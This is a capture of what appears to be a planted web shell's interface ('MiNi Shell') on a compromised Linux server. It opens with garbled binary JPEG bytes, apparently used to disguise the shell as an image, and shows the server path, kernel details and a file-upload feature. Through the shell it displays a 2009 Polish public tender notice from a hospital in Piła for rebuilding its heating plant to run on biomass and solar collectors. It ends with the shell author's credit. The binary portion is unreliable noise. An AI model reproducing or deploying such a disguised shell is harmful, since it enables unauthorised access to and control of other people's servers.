JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151314-N-2009.html

<p class="kh_header"><b>Piła: Przebudowa Systemu Grzewczego z Kotłowni Miałowej na Kotłownię Wykorzystującą jako paliwo Biomasę i Ciepło z Kolektorów Słonecznych z Jednoczesną Modernizacją Sieci Przesyłowych</b><br>
<b>Numer ogłoszenia: 151314 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny w Pile , ul. Rydygiera 1, 64-920 Piła, woj. wielkopolskie, tel. 067 2106207, faks (067) 212 40 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalpila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Systemu Grzewczego z Kotłowni Miałowej na Kotłownię Wykorzystującą jako paliwo Biomasę i Ciepło z Kolektorów Słonecznych z Jednoczesną Modernizacją Sieci Przesyłowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa sytemu grzewczego w Szpitalu   Specjalistycznym w Pile w taki sposób, aby dotychczasowe zasilanie kotłowni miałem węglowym zastąpić przyjaznym dla środowiska ciepłem pochodzącym z źródeł energii 
odnawialnej (zrębki i energia słoneczna -kolektory). Dodatkowo przebudowa sytemu 
poprzez jego modernizację i uszczelnienie ma sprzyjać ograniczeniu emisji substancji szkodliwych do atmosfery. Z uwagi na wyjątkową działalność inwestora, jaką jest   opieka zdrowotna, wiążąca się z dbałością o zdrowie i życie ludzkie, inwestycja przewiduje alternatywne, awaryjne zasilanie źródeł ciepła gazem ziemnym i olejem opałowym lekkim.
 Projektowana inwestycja obejmować będzie m.in.
1) przebudowę dotychczasowej kotłowni miałowej na kotłownię wodną niskoparametrową opalaną zrębkami drewna (rezerwowo przewidziano olej lekki) o mocy 7,8 MW z adaptacją dotychczasowych pomieszczeń i dobudową nowych (dobudowa budynku zawierającego m.in. salę kotłów, skład opału , magazyn oleju opałowego i komin)
2)budowę kotłowni parowej na bazie istniejącej kotłowni węglowej z usytuowaniem kotłowni w budynku (piwnice ) pralni oraz budową magazynu oleju opałowego, W kotłowni parowej przewidziano dwie wytwornice pary o mocy 2 x 834 kW zasilane gazem ziemnym GZ 50, z olejem opałowym lekkim jako paliwem rezerwowym. Zapotrzebowanie na parę wodną podyktowane jest koniecznością przeprowadzania sterylizacji w pomieszczeniach Centralnej Sterylizacji wymaganych przepisami sanitarnymi dla szpitali oraz w niewielkich ilościach przez kuchnię. Wytwornice pary zostaną zainstalowane w pralni / obiekt o największym zapotrzebowaniu pary /. Rozwiązanie zmniejszy w znacznym stopniu straty przesyłu, a także poprawi gospodarkę kondensatem. 
3)budowę systemu kolektorów słonecznych na potrzeby częściowego przygotowania cwu o powierzchni 204,2 m2. 
Minimalne wymogi dla kolektorów słonecznych:
a)wartość absorpcyjna min 95%
b)emisyjność max 5%
c)sprawność optyczna min 80%
4)budowę na potrzeby kotłowni wodnej magazynu na zrębki zapewniającego zapas paliwa na dwa tygodnie
5)włączenie odzysku ciepła odpadowego ze spalarni odpadów w system kotłowni wodnej
6)modernizacja sieci
a)sieć wodociągowa, hydranty p.poż. - sieć wodociągowa - bez zmian, budowa dwóch nowych hydrantów o80 na istniejącej sieci
b)sieć ciepłej wody dla celów socjalnych - wymiana izolacji
c)sieć kanalizacji sanitarnej - odprowadzenie ścieków sanitarnych z sali kotłów poprzez włączenie do istniejącej sieci ks o200 w istniejącej jezdni
d)sieć kanalizacji deszczowej - odprowadzenie wody deszczowej z projektowanego budynku poprzez włączenie do istniejącej sieci kd o400 
e)sieć c.o. wody grzejnej - projektuje się wymianę armatury sieci cieplnej oraz izolacji termicznej ciepłociągów i armatury, demontaż sieci dla budynku pralni
f)sieć c.o. parowa - projektuje się wymianę istniejących rurociągów oraz izolacji termicznej ciepłociągów i armatury, projektuje się dodatkowe punkty odwadniającej na sieci parowej zapewniające odpowiednią jakość pary na odbiornikach demontaż sieci dla budynku pralni
g)sieć cyrkulacji - demontaż sieci dla budynku pralni; wymiana izolacji
h)sieć wody zimnej zmiękczonej - demontaż sieci dla budynku pralni
i)sieć gazowa - budowa fragmentu sieci gazowej - doprowadzenie do budynku spalarni i pralni (g o90) oraz kuchni i patomorfologii (g o25); stacja redukcyjno - pomiarowa gazu oraz podłączenie do sieci gazowej zostaną zrealizowane wg projektu Wielkopolskiego Operatora Systemu Dystrybucyjnego Sp. z o.o. w Poznaniu
j)sieć oświetlenia terenu - projektuje się likwidację pięciu istniejących latarni i nową sieć oświetlenia terenu (dziewięć latarni podwójnych) oraz wymianę dwóch istniejących latarni pojedynczych
7)modernizację uzbrojenia terenu towarzyszącą inwestycji oraz inne (drogi, stacje uzdatniania wody, klimatyzacja, wentylacja i inne)
1.1.Szczegółowo przedmiot zamówienia jest opisany w projekcie budowlanym, specyfikacjach  technicznych wykonania i odbioru robót, przedmiarach robót, projekcie umowy, które stanowią załączniki do SIWZ.  Ze względów technicznych Zamawiający nie jest w stanie zamieścić całości dokumentacji na stronie internetowej. Zamawiający przygotował komplet dokumentacji projektowej, wykonawczej, specyfikacje techniczne wykonania i odbioru robót w formie elektronicznej na płytach, które zainteresowani otrzymają nieodpłatnie.
W zakresie zastosowanych kotłów, pomp i innych urządzeń kotłowni Zamawiający 
dopuszcza składanie ofert równoważnych. Urządzenia zaproponowane przez Wykonawcę muszą gwarantować równoważność w stosunku do tych jakie przewiduje  dokumentacja. Wykonawca musi zachować podstawowe wymogi dotyczące zaprojektowanej technologii, parametrów nie gorszych niż zawarte w dokumentacji  technicznej:
 dla kolektorów słonecznych:
 a)wartość absorbcyjna min. 95%
 b)emisyjność max 5%
 c) sprawność optyczna nie mniejsza niż 80%
     dla kotłowni na biomasę:
  moc znamionowa kotła 2,6 MW osiągana dla paliwa o wilgotności bezwzględnej 
 50% (50% wody w kg paliwa) i przy paliwie o wartości 8 MJ/kg
 d) kotły pięciociągowe o sprawności równej lub wyższej niż 89% (wartość dla paliwa suchego,
 e) Ruszt ruchomy z napędem hydraulicznym o zmiennej prędkości z możliwością 
             podziału na co najmniej dwie niezależnie napędzane strefy, wykonany z materiału o żarowytrzymałości powyżej 1150 0C,
 co najmniej trzy regulowane strefy nadmuchu powietrza pod ruszt,
 obciążenie cieplne rusztu poniżej 540 kW/m2,
 obciążenie cieplne komory spalania poniżej 300 kW/m2,
 hydraulicznie napędzana zasuwa p.poż. napędzana w przypadku zaniku zasilania 
  elektrycznego z akumulatora hydraulicznego. System gaszenia pożaru w podajniku 
 paliwa w oparciu o automatycznie otwierający się zawór termostatyczny,
  system recyrkulacji spalin,
  pneumatyczny system automatycznego czyszczenia płomieniówek,
  multicyklon wykonany jako bateria minimum 40 cyklonów żeliwnych, 
  zapewniających wymagany poziom emisji pyłu (poniżej 100 mg/Nm3 w zakresie 
  obciążeń 40 - 100%, przy referencyjnym poziomie 6% O2,
  ciągła regulacja poziomu tlenu w spalinach,
  sprawność kotła musi być potwierdzona szczegółowymi obliczeniami wykonanymi 
  przez producenta kotła.
  Dla kotłowni parowej:
 a) dwie wytwornice pary, trójciągowe o wydajności 1250 kg/h i ciśnieniu roboczym 12 - 11 bar każda,
 b) sprawność wytwornic - 91,4% dla zasilania gazem i olejem,
 c) moc palnika 912 - 913 kW,
 d) pojemność wodna - 250 l,
 Zamawiający wymaga, aby oferowane kotły na biomasę nie były prototypem - 
 muszą być wdrożone do produkcji, wyprodukowane, zainstalowane i dopuszczone do eksploatacji przez właściwe służby.
Oferowane kotły muszą posiadać autoryzowany przez producenta serwis oraz magazyn części zamiennych na terenie Polski. Przedstawione urządzenia technologiczne równoważne nie mogą zmieniać  warunków eksploatacyjnych przyjętych w dokumentacji technicznej, a  zaproponowane urządzenia technologiczne nie mogą posiadać parametrów  gorszych od ujętych w dokumentacji projektowej. Wykonawca w przedłożonej 
ofercie musi udokumentować ten fakt przez załączenie do oferty kart katalogowych 
urządzeń w języku polskim oraz załączyć kopie wymaganych przepisami prawa  certyfikatów, aprobat i dopuszczeń, zgodnie z art. 30 ust. 5 upzp. Zamawiający 
 oceni, czy przedłożona oferta spełnia w/w wymogi i zadecyduje o dopuszczeniu jej 
do tej części postępowania jaką jest ocena złożonych ofert. Oferty nie 
        spełniające powyższych wymagań zostaną odrzucone jako niezgodne z SIWZ. 
Zamawiający nie dopuszcza zmiany :
a) rodzaju paliwa kotłowni wodnej i parowej,
b) lokalizacji obiektów budowlanych, ich konstrukcji, elewacji i gabarytów,
c) dróg dojazdowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.40-5, 45.33.11.10-0, 45.33.30.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 500.000,00 zł (sównie: pięćset tysięcy zł)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają  następujące warunki:

1.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 upzp.
2.Posiadają niezbędną wiedzę i doświadczenie. W tym względzie  udokumentują, że w ciągu ostatnich 5 lat (2004 - 2009), a jeżeli okres działalności jest krótszy - w tym okresie pełniąc funkcję wykonawcy zrealizowali z należytą starannością co najmniej: 
 a) jedno zamówienie na roboty budowlane polegające na budowie kotłowni opalanej biomasą o mocy minimum 6 MW
 b)jedno zamówienie na roboty budowlane polegające na budowie systemu kolektorówsłonecznych o powierzchni minimum 200 m2
 c) jedno zamówienie na roboty budowlane polegające na budowie kotłowni parowej o wydajności nie mniejszej niż 2 t/h
3. Zatrudnią kierownika budowy z niemniej niż trzyletnim doświadczeniem na tym  
 stanowisku oraz kierowników robót branżowych. 
4. Dysponują sprzętem budowlanym, niezbędnym do realizacji robót - ustalonym w 
   Specyfikacjach Technicznych Wykonania i Odbioru Robót.
5. Znajdują się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie zamówienia i w tym względzie udokumentują, że posiadają środki obrotowe lub zdolność kredytową na kwotę stanowiącą co najmniej 25% ceny ofertowej brutto.
6. Zobowiążą się do ubezpieczenia budowy w wiarygodnym zakładzie ubezpieczeń 
 w następującym zakresie:
a)Wykonawca ma obowiązek posiadać przez cały okres realizacji zamówienia ważną umowę odpowiedzialności cywilnej (deliktowej i kontraktowej) z tytułu prowadzonej działalności gospodarczej związanej z realizacją przedmiotu zamówienia na sumę gwarancyjną nie niższą niż 5 000 000,00 złotych na jedno i wszystkie zdarzenia, z rozszerzeniem o:
a) odpowiedzialność cywilną za szkody wyrządzone przez podwykonawców (bez  
   podlimitu) z zachowaniem lub nie prawa do regresu,
b) odpowiedzialność cywilną za szkody w środowisku z podlimitem nie niższym niż 
  1 000 000,00 złotych na jedno i wszystkie zdarzenia,
c) odpowiedzialność cywilną za szkody wyrządzone w związku z ruchem pojazdów  
   nie podlegających obowiązkowemu ubezpieczeniu odpowiedzialności cywilnej 
   posiadacza pojazdów mechanicznych, jeżeli takie pojazdy będą używane na placu budowy z podlimitem 500 000,00 złotych na jedno i wszystkie zdarzenia,
d) odpowiedzialność cywilna za czyste straty finansowe z podlimitem 500 000,00 
   złotych na jedno i wszystkie zdarzenia.
e) Wykonawca dostarczy Zamawiającemu oryginał lub notarialnie potwierdzoną kopię polisy spełniającej wymogi określone w pkt. a) wraz ze wszystkimi załącznikami, ogólnymi warunkami oraz dowodem zapłaty całości składki najpóźniej w dniu podpisania umowy.
7. Udzielą gwarancji jakości za wykonane roboty na okres nie krótszy niż 36 miesięcy, a na wbudowaną stolarkę 60 miesięcy. Na wmontowane urządzenia obowiązuje okres gwarancji producentów liczony od dnia bezusterkowego odbioru robót, jednak nie może on być krótszy niż 24 miesiące.
8. Wskażą w ofercie części zamówienia, których wykonanie powierzą podwykonawcom i zgodnie z art. 6471 § 2 Kodeksu cywilnego zobowiążą się uzyskać zgodę Zamawiającego na  zawarcie umów z podwykonawcami.
9. W przypadku propozycji urządzeń równoważnych, Wykonawca jest zobowiązany 
 załączyć do oferty karty katalogowe proponowanych urządzeń w języku polskim oraz załączyć kopie wymaganych przepisami prawa certyfikatów, aprobat i dopuszczeń,które będą podstawą do oceny przez Zamawiającego równoważności oferty. Ofertynie spełniające powyższych wymagań będą odrzucone jako niezgodne z treścią SIWZ.W przypadku zaoferowania urządzeń projektowanych nie wymaga się załączania do oferty kart katalogowych urządzeń.
10. Wyrażą zgodę na następujące warunki płatności:
11. Wykonawca będzie wystawiał Faktury VAT za części robót wynikające z
   harmonogramu robót i płatności załączonego do oferty.
12. Termin zapłaty faktur - 30 dni od doręczenia faktury Zamawiającemu.
13. Wartość ostatniej faktury nie może być mniejsza niż 10% ceny oferty.
14. Zapłata należności za ostatnią fakturę będzie uwarunkowana:   
 a) bezusterkowym odbiorem końcowym robót.
 b) rozliczeniem się Wykonawcy z podwykonawcami (jeżeli podwykonawców  
 zatrudni).
15. Harmonogram robót i płatności
16. Wykonawca jest zobowiązany sporządzić szczegółowy harmonogram robót i 
 płatności, który musi uwzględniać uwarunkowania wynikające z dokumentacji 
 projektowej, możliwości przerobowe Wykonawcy w zakresie robót budowlanych i 
 montażowych, kolejność robót. Harmonogram winien wyraźnie przedstawiać w 
etapach tygodniowych proponowany postęp robót w zakresie głównych obiektów i 
zadań kontraktowych.  Harmonogram winien przewidywać płatności za etapy robót, możliwe do odebrania przez Inspektora Nadzoru Inwestorskiego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełniony formularz oferty.
2.Pełnomocnictwo do podpisania oferty i umowy jeżeli forma reprezentacji nie wynika z wpisu do KRS lub ewidencji działalności gospodarczej.
3.Oświadczenie o spełnianiu warunków określonych w art. 22 ust.1 ustawy Pzp, na 
 formularzu stanowiącym załącznik nr 2.
4.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
 rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 
24 ust. 1 pkt. 4-8 ustawy upzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 
 24 ust.1 pkt. 9 ustawy upzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz 
właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające 
odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek naubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidzianeprawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert.
8.Oświadczenie Wykonawcy, że reprezentowana przez Niego firma nie jest w stanie upadłości, ani nie otwarto jej likwidacji.
9.Informację o doświadczeniu Wykonawcy - wykaz wykonanych w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych określonych  w pkt. 6.2. SIWZ z podaniem ich wartości oraz daty i miejsca wykonania  - załącznik Nr 3 do SIWZ.                                                                                                                                                               
 Do informacji należy załączyć dokumenty potwierdzające, że wymienione 
 roboty zostały wykonane należycie. Dokumenty te powinny być wystawione przez 
 inwestora zamawiającego. Dokument referencyjny winien zawierać co najmniej okres  wykonania zamówienia, wartość zamówienia, parametry techniczne wykonanych robót, rodzaj zainstalowanych urządzeń.. 
 Roboty w wykazie nie potwierdzone w.w. dokumentami nie będą brane pod uwagę przez Zamawiającego.
10.Informacje o kwalifikacjach i doświadczeniach podstawowego personelu 
 kierowniczego i technicznego proponowanego do zatrudnienia na budowie w realizacji robót - załącznik Nr 4 do SIWZ. Informacja winna zawierać rodzaj i numery uprawnień budowlanych oraz potwierdzenie przynależności  do Krajowej Izby Inżynierów budownictwa lub właściwej izby samorządu zawodowego architektów, inżynierów budownictwa oraz urbanistów, zgodnie z art. 6 ustawy z dnia 15 grudnia 2000 r. o samorządzie zawodowym architektów, inżynierów budownictwa i urbanistów (Dz.U. z 2001 r. Nr 5, poz. 42 z późn. zm.). 
11.Informację o sprzęcie, którym dysponuje Wykonawca, niezbędnym do realizacji 
 robót  - na formularzu zgodnym z treścią załącznika nr  5 - Wykaz sprzętu.
12.Informacja z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
13.Zobowiązanie do ubezpieczenia budowy na warunkach wymaganych w pkt. 6.6. SIWZ.
14.Informacja o ewentualnym zatrudnieniu podwykonawców robót - na formularzu 
 zgodnym z treścią załącznika Nr 6 do SIWZ. 
15.Wypełniony załącznik Nr. 8.
16.Harmonogram robót i płatności.
17 W przypadku składania oferty równoważnej - karty katalogowe oferowanych  urządzeń, certyfikaty, aprobaty techniczne, dopuszczenia. do zał. Nr 8
18.Dowód wniesienia wadium.

19.Oferty wspólnie złożone przez Konsorcjum Wykonawców, składające się z dwóch lub więcej przedsiębiorstw jako partnerów, będą musiały spełniać następujące wymagania:
20.Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego.
21.Żaden z Wykonawców nie może podlegać wykluczeniu z postępowania.
22.Wykonawcy składając ofertę wspólnie, powinni łącznie spełniać warunki w 
postępowaniu.
23.W przypadku wyboru do realizacji zamówienia Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu przed podpisaniem umowy - umowę konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-pila.4bip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny w Pile im. Stanisława Staszica 64-920 Piła, ul. Rydygiera 1 pok. D3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2009 godzina 11:00, miejsce: Szpital Specjalistyczny w Pile im. Stanisława Staszica 64-920 Piła ul. Rydygiera 1 pok. D14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków:
1. Fundacji Eko Fundusz z Warszawy (ok. 20% kosztów inwestycji)
2. Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Poznaniu (ok. 25% kosztów inwestycji)

Creat By MiNi SheLL
Email: jattceo@gmail.com